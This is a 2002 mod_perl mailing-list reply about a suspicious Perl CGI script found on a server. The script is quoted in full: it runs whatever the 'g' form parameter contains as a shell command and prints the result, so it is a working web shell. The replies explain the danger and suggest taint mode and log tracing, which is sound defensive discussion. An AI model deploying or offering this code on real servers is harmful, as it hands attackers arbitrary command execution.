Chris Reinhardt wrote: > On Thu, 21 Mar 2002, John Michael wrote: > > >>#!/usr/bin/perl >>use CGI qw(:standard); >>print header; >>my $k=param("g"); >>my $a=param("s"); >>if ($a || $k) { >> $l=`$k 2>&1`; >> print start_form,textarea("g",$k,1,50); >> print submit("sc"); >> print end_form; >> print pre($l); >>} >>print $ENV{"SERVER_NAME"}; >> > > It executes arbitrary commands as <whatever your httpds run as>.
don't delete it, but add the -T flag #!/usr/bin/perl -T In addition for the hacker not being able to run anything and probably not understanding why, you will be able to check the logs to see what IP the script was called from and hopefully trace down the bugger. _____________________________________________________________________ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/